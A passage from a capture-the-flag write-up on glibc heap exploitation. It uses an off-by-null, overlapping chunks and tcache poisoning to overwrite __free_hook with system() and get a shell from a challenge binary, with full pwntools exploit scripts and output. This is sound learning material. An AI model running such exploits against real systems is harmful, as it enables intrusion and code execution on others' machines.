Repeat for each nullbyte, season to taste and it will be ready to be served.

AAAAAA00BBBBBB0CCC (what we want to write)
XXXXXXXXXXXXXn0CCC (what we currently have in the chunk)
XXXXXXXXBBBBBB     (what we write in the 3rd step)
XXXXXXXXBBBBBB0CCC (what we have in the chunk after this step)

Adding a simple check to make it more versatile, we have the following.

def create_chunk(size, contents = None):
    # Fill buffer with a string with desired size for strlen()
    r.write(b"X" * (size - 0x8) + b'\0'); sleep(deltat)
    if(contents is None): return

    idx = None
    previdx = None
    while (idx := contents.rfind(b'\0', 0, idx)) != -1:
        # Write what goes between the null we are considering now, and the
        # one we considered the last iteration
        if len(contents[idx + 1:previdx]) != 0:
            r.write(b"Y" * (idx + 1) + contents[idx + 1:previdx]); sleep(deltat)
        # Place the null where it belongs
        r.write(b"Z" * (idx - 1) + b'\n'); sleep(deltat)
        previdx = idx
    r.write(contents[:previdx]); sleep(deltat)
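Before pointing it at the binary, we can replay the same loop against a plain bytearray to convince ourselves it reconstructs the target. A minimal offline sketch, assuming the echo behavior shown in the diagrams: every write overwrites the front of the buffer, and a newline-terminated write additionally leaves a nullbyte right after itself.

```python
def place_nulls(buf, contents):
    """Replay create_chunk()'s write sequence against a plain bytearray."""
    def write(data):
        buf[:len(data)] = data      # writes land at the start of the buffer
        if data.endswith(b'\n'):
            buf[len(data)] = 0      # modeled: a nullbyte follows the newline

    idx = None
    previdx = None
    while (idx := contents.rfind(b'\0', 0, idx)) != -1:
        if len(contents[idx + 1:previdx]) != 0:
            write(b"Y" * (idx + 1) + contents[idx + 1:previdx])
        write(b"Z" * (idx - 1) + b'\n')
        previdx = idx
    write(contents[:previdx])
    return bytes(buf[:len(contents)])

target = b"AAAAAA\0\0BBBBBB\0CCC"   # the example above: nulls at 6, 7 and 14
assert place_nulls(bytearray(len(target)), target) == target
```

If this model of the binary's echo is right, create_chunk() can reconstruct arbitrary null-laden contents; the offsets used in the rest of the exploit rely on exactly this behavior.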

Using this new toy we can rewrite our script.

from pwn import *

r = process("./binary")
deltat = .05

def create_chunk(size, contents = None):
    # Fill buffer with a string with desired size for strlen()
    r.write(b"X" * (size - 0x8) + b'\0'); sleep(deltat)
    if(contents is None): return

    idx = None
    previdx = None
    while (idx := contents.rfind(b'\0', 0, idx)) != -1:
        # Write what goes between the null we are considering now, and the
        # one we considered the last iteration
        if len(contents[idx + 1:previdx]) != 0:
            r.write(b"Y" * (idx + 1) + contents[idx + 1:previdx]); sleep(deltat)
        # Place the null where it belongs
        r.write(b"Z" * (idx - 1) + b'\n'); sleep(deltat)
        previdx = idx
    r.write(contents[:previdx]); sleep(deltat)

### Fill tcache bin for 0x100 ###
log.info("Filling tcache bin 0x100")
log.info("Allocating 0x100") # First one is for free
create_chunk(0x100)
for i in range(6):
    log.info("Allocating 0x%03x" % (0x1f0 - (i * 0x10)))
    create_chunk(0x1f0 - (i * 0x10))
log.info("Allocating 0x100 (overflowing)")
r.write(b"A" * (0x100 - 9) + b'\n' + b'\0'); sleep(deltat)
for i in range(5):
    log.info("Allocating 0x%03x (overflowing)" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 9) + b'\n' + b'\0'); sleep(deltat)
# Last one doesn't need to be overflowed
log.info("Allocating 0x1a0")
create_chunk(0x1a0); sleep(deltat)

### Leak heap ###
r.clean()
log.info("Allocating 0x100 (leaking)")
create_chunk(0x100, b"A")
heap = int.from_bytes(r.read()[-6:], "little") - 0xa41
log.info("Heap : 0x%06x" % heap)

### Insert a chunk in unsorted ###
log.info("Allocating 0x20")
create_chunk(0x20)
log.info("Allocating 0x110")
data  = b''
data += b"A" * (0x100 - 0x8)
data += p64(0x21) # Size of our fake next chunk
create_chunk(0x110, data)

log.info("Allocating 0x20 (overflowing)")
data  = b''
data += b"A" * (0x20 - 0x10)
data += p64(0x20) # 0x110 chunk's prev_size
data += b'\0'     # Off-by-null into 0x110 chunk's size
create_chunk(0x20, data)

log.info("Allocating 0x110")
r.write(b"A" * (0x20 - 8 + 1)) # Reach nullbyte introduced when allocating 0x20

r.interactive()

Now let’s pick up where we left off, yes?

Do you like it from behind? (or how to consolidate backwards)

So far we have only been creating partial fake chunks, but we need to ensure that the backward consolidation works fine and that free() won’t try to consolidate forward (or, if it does, that it does so correctly too, but that probably won’t be necessary).

Looking again at unlink():

    FD = P->fd;                                                               \
    BK = P->bk;                                                               \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                     \
        malloc_printerr ("corrupted double-linked list");                     \

It checks that the chunk being unlinked is the next of its previous and the previous of its next, which indisputably makes sense. The simplest circularly-linked lists are those with only one sole and lone element (how redundant’s that sentence?), which has itself as both previous and next (lol, I’ve never thought of myself as a circularly-linked list).
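As a sanity check, here is a toy model of that unlink() integrity check (plain Python objects with fd/bk attributes standing in for chunk pointers, not glibc): a single self-linked fake chunk passes, while a one-sided forgery aborts.

```python
class Chunk:
    """Toy stand-in for a malloc_chunk's fd/bk pointers."""
    def __init__(self):
        self.fd = self.bk = None

def unlink_check(p):
    # Mirrors the 2.27 check: if (FD->bk != P || BK->fd != P) abort
    if p.fd.bk is not p or p.bk.fd is not p:
        raise RuntimeError("corrupted double-linked list")

fake = Chunk()
fake.fd = fake.bk = fake    # one-element circular list: it is its own neighbor
unlink_check(fake)          # passes the integrity check

legit, evil = Chunk(), Chunk()
legit.fd = legit.bk = legit
evil.fd = evil.bk = legit   # evil claims legit as neighbor; legit disagrees
try:
    unlink_check(evil)
    raise AssertionError("unreachable: the check should have fired")
except RuntimeError:
    pass                    # forgery detected, as free() would detect it
```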

It’s important to take into account that we can’t use the true previous chunk, because when it is put back into the tcache its fwd pointer will be overwritten with a NULL, so we will need to build a complete fake chunk inside the true previous one. Making this fake chunk as small as possible, it will be of size 0x20, which means that the actual previous chunk must be of size (at least) 0x30.

log.info("Allocating 0x30 (overflowing)")
data  = b''
data += p64(0xaaaaaaaaaaaaaaaa) # prev_size <----+
data += p64(0x21)               # size           |
data += p64(heap + 0xe10)       # ---------------+
data += p64(heap + 0xe10)
data += p64(0x20) # Next's prev size
data += b'\0'     # Off by null into next's size
create_chunk(0x30, data)

We are making a fake previous chunk with size 0x20 linked against itself. The heap offsets were obtained empirically with gdb.2

Now that the backward consolidation has been dealt with, we can move forward to the forward consolidation. The partial fake next chunk we built earlier has to be marked as in use, which means that its next chunk has to have the PREV_INUSE bit set. The legitimate next chunk (in our case the top chunk) does have the PREV_INUSE bit set, so we can use it. So, at offset 0xf0 we place a chunk, which we are going to make the smallest possible too, 0x20, and we can’t place only its headers because 0x20 bytes further on we need the legit next chunk. This means that our chunk has to be of size 0x120 (0xf0 + 0x20 + 0x10 for our own headers).
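The arithmetic is worth double-checking. A quick sanity check in plain Python, using only the constants from the paragraph above:

```python
HEADER  = 0x10   # prev_size + size fields
MINSIZE = 0x20   # smallest 64-bit chunk: the fake next chunk's size

shrunken = 0x100                        # our chunk's size after the off-by-null
fake_next_offset = shrunken - HEADER    # the fake next header sits at 0xf0
alloc = fake_next_offset + MINSIZE + HEADER   # 0xf0 + 0x20 + our own headers

assert fake_next_offset == 0xf0
assert alloc == 0x120
# After free(), the fake 0x20 prev chunk merges with the shrunken 0x100 one,
# yielding 0x120 again: the size gef reports for the unsorted-bin chunk.
assert MINSIZE + shrunken == alloc
```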

### Insert a chunk in unsorted ###
log.info("Allocating 0x30")
create_chunk(0x30)
log.info("Allocating 0x120")
data  = b''
data += b"A" * (0x100 - 0x10)
data += p64(0xaaaaaaaaaaaaaaaa) # prev_size
data += p64(0x21)               # size
data += b"A" * 0x10
create_chunk(0x120, data)

log.info("Allocating 0x30 (overflowing)")
data  = b''
data += p64(0xaaaaaaaaaaaaaaaa) # prev_size <----+
data += p64(0x21)               # size           |
data += p64(heap + 0xe10)       # ---------------+
data += p64(heap + 0xe10)
data += p64(0x20) # Next's prev size
data += b'\0'     # Off by null into next's size
create_chunk(0x30, data)

Now all that remains is how to allocate and free the 0x120 chunk without overwriting what we’ve put in it. By writing just enough to reach the nullbyte we placed in the stack buffer when we allocated the 0x30 chunk, we would only overwrite the first 0x28 bytes (notice that beyond this nullbyte a string of size 0x118 continues), with the fake chunk safe at offset 0xf0.

log.info("Allocating 0x120 (moving to unsorted)")
# Reach the nullbyte placed when allocating 0x30
r.write(b"A" * (0x30 - 8 + 1)); sleep(deltat)

And, sure enough, with gef we can see that everything behaved seamlessly: the program keeps running and we have our baby in the unsorted bin:

[+] unsorted_bins[0]: fw=0x555555604e10, bk=0x555555604e10
 →   Chunk(addr=0x555555604e20, size=0x120, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.

Which also means that it contains a couple of pointers to the libc:

0x555555604e20: 0x00007ffff7bebca0  0x00007ffff7bebca0

Check this out: the chunk is still of size 0x120 even though we changed its size to 0x100. This is because it isn’t really our chunk; it is the fake previous one (0x20) merged with ours (now 0x100).3

Shall we just r.write(b'A')?

Huh, nope, it doesn’t work, let’s see why. If I place a breakpoint at the call to malloc() I can see it is in fact returning our chunk but…

$rax   : 0x0000555555604e20  →  0x0000000000000000

what the actual fuck? Why is there a NULL pointer? Where did my pointer go? Ok, let me calm down; we will try to understand it later. For now I’ve just realized that it is only the fwd pointer, the bck pointer is still there, which means we only need to step over the dead body of the first pointer, simple enough.

log.info("Allocating 0x120 (leaking)")
r.clean()
r.write(b"A" * 8); sleep(deltat)
libc = int.from_bytes(r.read()[-6:], "little") - 0x3ebca0
log.info("Libc : 0x%x" % libc)

Great, we got a sweet libc address. We got this!

Where did my pointer go? (or a deeper understanding of malloc()’s nonsenseness)

And I also found the reason why our pointer gets lost in the darkness: when iterating over the unsorted bin, malloc()

    if (size == nb)
    {
        set_inuse_bit_at_offset (victim, size);
        if (av != &main_arena)
            set_non_main_arena (victim);
#if USE_TCACHE
        /* Fill cache first, return to user only if cache fills.
        We may return one of these chunks later.  */
        if (tcache_nb
            && tcache->counts[tc_idx] < mp_.tcache_count)
        {
            tcache_put (victim, tc_idx);
            return_cached = 1;
            continue;
        }
        // [...]

prioritizes filling the tcache, and only when there is no other option does it return one of the chunks it placed there. So, before getting to us, our chunk makes a little trip to the tcache bin for 0x120 (like going to jail in Monopoly with a “Get Out of Jail Free” card), where it is the only chunk, hence the NULL written into its fwd pointer.
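The detour can be modeled in a few lines (plain Python, simplified from 2.27’s tcache_put(); the dict keys are just stand-ins for chunk fields): pushing onto an empty bin writes the old head, NULL, into the chunk’s first qword, which is exactly the fwd slot we read.

```python
class TcacheBin:
    """Toy model of one 2.27 tcache bin: a singly linked LIFO list."""
    def __init__(self):
        self.head = None
        self.count = 0

    def put(self, chunk):
        # tcache_put(): e->next = tcache->entries[tc_idx]; entries[tc_idx] = e
        chunk["fd"] = self.head      # old head: None for an empty bin
        self.head = chunk
        self.count += 1

# Our chunk arrives from the unsorted bin with two libc pointers in it
chunk = {"fd": "unsorted fd (libc ptr)", "bk": "unsorted bk (libc ptr)"}
bin_0x120 = TcacheBin()              # empty: nothing of size 0x120 freed yet
bin_0x120.put(chunk)

assert chunk["fd"] is None           # fwd pointer clobbered with NULL
assert chunk["bk"] == "unsorted bk (libc ptr)"   # bck survives: our leak
```

The tcache next pointer reuses the chunk’s fd slot while bk is untouched, which is why stepping over 8 bytes still leaks a libc address.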

So right now what we’ve got to do is choose where we are going to write, what we are going to write and, more importantly, how.

Overlapping is the best love language (or how to get inside her headers)

Ok, please, don’t laugh at me, but at the time I experienced the realization of the overlapped chunk we had just created, by accident really, as something profound; now I know it is the standard technique in this sort of scenario. Anyway, I think it is kind of beautiful to just reinvent the wheel or rediscover the Mediterranean. I’m certainly having a shitload of fun while learning a lot, and I hope the reader isn’t holding their head in their hands too much and that they can enjoy with me my inexperience in the field of heap exploitation.

In any case, what an ineffable serendipity! I was just trying to leak a libc address, and I ended up finding a way to write wherever I want. If there had been another method to leak a libc address and I had used it, maybe the overlapping chunks technique would never have occurred to me, and I would never have solved this challenge.

Back on track. As I just said, we have created, by accident, two overlapping chunks, so we can corrupt all of our chunk’s metadata from the other one; by writing into the 0x30 chunk we can make our chunk’s next pointer in the linked list be whatever we want. Something like this ought to work:

log.info("Allocating 0x30 (exploit overlapping chunks)")
data  = b''
data += b"A" * 0x8 # Reach fake chunk's fd pointer within 0x30 chunk
# Change its size to anything other than 0x120 to prevent it from
# going back to the 0x120 bin
data += p64(0x130)
data += p64(libc) # Pointer to _whatever_ we want
create_chunk(0x30, data)

log.info("Allocating 0x120 twice")
# First remove _our_ chunk from the list and place it in the 0x130 list
r.write(b"A" * (0x120 - 8))
# This malloc() will return a pointer to the libc
r.write(b"A" * (0x120 - 8))

As expected, we can make malloc() return whatever address we want:

$rax   : 0x00007ffff7800000  →  0x03010102464c457f
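What just happened reduces to classic 2.27 tcache poisoning. A toy model (plain Python dictionaries standing in for chunks, hypothetical names): the bin head’s next pointer is followed with no validation, so the second allocation returns whatever pointer we forged.

```python
class TcacheBin:
    """Toy 2.27 tcache bin: malloc() pops the head with no pointer checks."""
    def __init__(self):
        self.head = None

    def put(self, chunk):
        chunk["fd"] = self.head     # free(): e->next = old head
        self.head = chunk

    def get(self):
        chunk = self.head
        # malloc(): the head's next pointer is followed blindly in 2.27
        self.head = chunk.get("fd")
        return chunk

bin_ = TcacheBin()
ours = {}
bin_.put(ours)                      # our chunk sits alone in the 0x120 bin

target = {"note": "pretend this is somewhere in the libc"}
ours["fd"] = target                 # what the overlapping 0x30 write achieves

assert bin_.get() is ours           # 1st malloc(0x118): our chunk, head -> target
assert bin_.get() is target         # 2nd malloc(0x118): the forged pointer
```

As I read it, the size rewrite to 0x130 in the script above only keeps the freed chunk from landing back on top of this bin between the two allocations.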

But we need to write to some place useful. Two options came to mind: atexit and __free/malloc_hook. __malloc_hook can be discarded immediately: in order to pass an address as its argument we would need to send a massive string to the program, which would be a problem in and of itself, and besides we are limited to strings of 512 bytes. atexit I’m pretty sure is a viable option, but __free_hook seems just too easy compared to having to study the atexit structures and all that; atexit also has the problem that the program has to live long enough to reach exit(), and I’m not sure whether it’s gonna make it with the heap in this condition (just like me and my liver).

Let’s prove we can gain control of the RIP register really easily

log.info("Allocating 0x30 (exploit overlapping chunks)")
data  = b''
data += b"A" * 0x8 # Reach fake chunk's fwd pointer within 0x30 chunk
# Change its size to anything other than 0x120 to prevent it from
# going back to the 0x120 bin
data += p64(0x130)
data += p64(libc + 0x3ed8e8) # Pointer to __free_hook as next entry in list
create_chunk(0x30, data)

log.info("Allocating 0x120 twice, overwriting __free_hook and triggering it")
# First remove _our_ chunk from the list and place it in the 0x130 list,
# then allocate a pointer to __free_hook and overwrite it with an arbitrary ptr
create_chunk(0x120, p64(0x6c6c6f726b636972))

In gdb:

$rax   : 0x6c6c6f726b636972 ("rickroll"?)
$rdi   : 0x00007ffff7bed8e8  →  "rickroll"

 → 0x7ffff7897c25 <free+725>       call   rax

It’s past my bedtime (or it’s time to finally put it all together)

The reason why the __free_hook way is so easy is that when the program calls free() (and, through its hook, whatever address we place there) it is already passing as an argument the address of something we control (the motherfucking chunk we just wrote to). So if we were to place in __free_hook… I don’t know, system() for example, while writing at the beginning of our chunk something like /bin/sh, we might win a shell. Now, we can’t place a null terminator for this string, but ; will do the job just fine.
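We can assemble and sanity-check the payload offline with struct.pack (the stdlib equivalent of pwntools’ p64); the libc base here is just an example value, not a fixed address:

```python
import struct

libc   = 0x7fdbcd400000        # example leaked base, ASLR decides the real one
system = libc + 0x4f440        # system() offset used in the final script

payload = b"/bin/sh;" + struct.pack("<Q", system)[:6]

# free(chunk) becomes __free_hook(chunk), i.e. system("/bin/sh;@\xf4...");
# sh runs /bin/sh first; the address bytes only error out once that shell exits.
assert payload.split(b";")[0] == b"/bin/sh"
assert len(payload) == 0xe and b"\0" not in payload   # create_chunk-friendly
```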

from pwn import *

r = process("./binary")
deltat = .05

def create_chunk(size, contents = None):
    # Fill buffer with a string with desired size for strlen()
    r.write(b"X" * (size - 0x8) + b'\0'); sleep(deltat)
    if(contents is None): return

    idx = None
    previdx = None
    while (idx := contents.rfind(b'\0', 0, idx)) != -1:
        # Write what goes between the null we are considering now, and the
        # one we considered the last iteration
        if len(contents[idx + 1:previdx]) != 0:
            r.write(b"Y" * (idx + 1) + contents[idx + 1:previdx]); sleep(deltat)
        # Place the null where it belongs
        r.write(b"Z" * (idx - 1) + b'\n'); sleep(deltat)
        previdx = idx
    r.write(contents[:previdx]); sleep(deltat)

### Fill tcache bin for 0x100 ###
log.info("Filling tcache bin 0x100")
log.info("Allocating 0x100") # First one is for free
create_chunk(0x100)
for i in range(6):
    log.info("Allocating 0x%03x" % (0x1f0 - (i * 0x10)))
    create_chunk(0x1f0 - (i * 0x10))
log.info("Allocating 0x100 (overflowing)")
r.write(b"A" * (0x100 - 9) + b'\n' + b'\0'); sleep(deltat)
for i in range(5):
    log.info("Allocating 0x%03x (overflowing)" % (0x1f0 - (i * 0x10)))
    r.write(b"A" * (0x1f0 - (i * 0x10) - 9) + b'\n' + b'\0'); sleep(deltat)
# Last one doesn't need to be overflowed
log.info("Allocating 0x1a0")
create_chunk(0x1a0); sleep(deltat)

### Leak heap ###
r.clean()
log.info("Allocating 0x100 (leaking)")
create_chunk(0x100, b"A")
heap = int.from_bytes(r.read()[-6:], "little") - 0xa41
log.info("Heap : 0x%06x" % heap)

### Insert a chunk in unsorted ###
log.info("Allocating 0x30")
create_chunk(0x30)
log.info("Allocating 0x120")
data  = b''
data += b"A" * (0x100 - 0x10)
data += p64(0xaaaaaaaaaaaaaaaa) # prev_size
data += p64(0x21)               # size
data += b"A" * 0x10
create_chunk(0x120, data)

log.info("Allocating 0x30 (overflowing)")
data  = b''
data += p64(0xaaaaaaaaaaaaaaaa) # prev_size <----+
data += p64(0x21)               # size           |
data += p64(heap + 0xe10)       # ---------------+
data += p64(heap + 0xe10)
data += p64(0x20) # Next's prev size
data += b'\0'     # Off by null into next's size
create_chunk(0x30, data)

log.info("Allocating 0x120 (moving to unsorted)")
# Reach the nullbyte placed when allocating 0x30
r.write(b"A" * (0x30 - 8 + 1)); sleep(deltat)

log.info("Allocating 0x120 (leaking)")
r.clean()
r.write(b"A" * 8); sleep(deltat)
libc = int.from_bytes(r.read()[-6:], "little") - 0x3ebca0
log.info("Libc : 0x%x" % libc)
system = libc + 0x4f440

log.info("Allocating 0x30 (exploit overlapping chunks)")
data  = b''
data += b"A" * 0x8 # Reach fake chunk's fd pointer within 0x30 chunk
# Change its size to anything other than 0x120 to prevent it from
# going back to the 0x120 bin
data += p64(0x130)
data += p64(libc + 0x3ed8e0) # Pointer to __free_hook - 8 as next entry in list
create_chunk(0x30, data)

log.info("Allocating 0x120 twice, overwriting __free_hook and triggering it")
# Will first remove chunk from list and then allocate a pointer to __free_hook-8
create_chunk(0x120, b"/bin/sh;" + p64(system)[:6])

r.clean()
r.interactive()
❯ python a.py
[+] Starting local process './echo': pid 40397
[*] Filling tcache bin 0x100
[*] Allocating 0x100
[*] Allocating 0x1f0
[*] Allocating 0x1e0
[*] Allocating 0x1d0
[*] Allocating 0x1c0
[*] Allocating 0x1b0
[*] Allocating 0x1a0
[*] Allocating 0x100 (overflowing)
[*] Allocating 0x1f0 (overflowing)
[*] Allocating 0x1e0 (overflowing)
[*] Allocating 0x1d0 (overflowing)
[*] Allocating 0x1c0 (overflowing)
[*] Allocating 0x1b0 (overflowing)
[*] Allocating 0x1a0
[*] Allocating 0x100 (leaking)
[*] Heap : 0x5593f03dc000
[*] Allocating 0x30
[*] Allocating 0x120
[*] Allocating 0x30 (overflowing)
[*] Allocating 0x120 (moving to unsorted)
[*] Allocating 0x120 (leaking)
[*] Libc : 0x7fdbcd400000
[*] Allocating 0x30 (exploit overlapping chunks)
[*] Allocating 0x120 twice, overwriting __free_hook and triggering it
[*] Switching to interactive mode
$ whoami
arget
$ pwd
/home/arget
$ 

And we have a shell! Remember to adjust deltat; you may need to increase it, especially when attacking a remote target.

An annoying echo

You know what? Fuck it, I don’t want a shell. After overwriting __free_hook, any string we send to the program will be passed to system() when its chunk gets freed, so we are able to run commands through our little program. This way we don’t even need to introduce “/bin/sh;”. This also means that the first free() after we overwrite the hook will be system() called on the chunk that now holds system()’s own address, so we would first get an ugly sh: line 1: $'@\364\204\367\377\177': command not found, but after that everything will work without problem: we would be able to execute any command (as long as its length stays within 512 bytes).

data += p64(libc + 0x3ed8e8) # Pointer to __free_hook as next entry in list
create_chunk(0x30, data)

log.info("Allocating 0x120 twice, overwriting __free_hook and triggering it")
# Will first remove chunk from list and then allocate a pointer to __free_hook
create_chunk(0x120, p64(system)[:6])

r.clean()
r.interactive()
$ pwd
pwd
/home/arget
$ whoami
whoami
arget
$ 

A perfect shell. Just with an annoying echo.

Signing off (or TL;DR)

I’d like to highlight a couple of key points, looking back on the long journey that brought us here.

I also want to thank the creator of this amazing challenge. I spent four days completely absorbed by it, had tons of fun and learnt a great deal. I guess not all (c)heap challenges are just Rubik’s cubes. It also gave me something to do on New Year’s Eve, which was writing this document.

Finally, I want to thank you too: if someone somehow managed to read() this far, I appreciate it very much, and it makes the effort of writing all this really worth it.

Happy new year from Madrid.
Y.

Ah Bartleby! Ah humanity!

— Melville, Bartleby, the Scrivener.

Notes

1 Notice that in fact this is preventing our chunk from being consolidated with the top chunk (which is the actual next one) and getting converted into the new top chunk (which would mean it wouldn’t go to any bin).

2 I’m setting the PREV_INUSE bit in the fake chunk size field because that’s what would make more sense from the free() perspective (“this chunk is free, so the previous one can’t be free or they would’ve been merged already”), but that bit is never checked so it really doesn’t have to be set.

3 Well, technically it isn’t a coincidence: we engineered our chunk with a size of 0x100 + MINSIZE because we wanted to make the fake next chunk as small as possible, i.e. MINSIZE, and it had to be at offset 0x100, at the end of the chunk. When we changed its size to 0x100 we effectively shortened it by MINSIZE, and when it got merged with the fake previous one, which we also made of the smallest possible size, we increased the size by precisely MINSIZE. Only if the fake chunks’ sizes differed would we end up with a resulting chunk of a different size.
It is also interesting to consider what would have happened if the resulting chunk had been of a different size. I mean, we already have the stack buffer filled with a string of size 0x118, ready to allocate a chunk of size 0x120.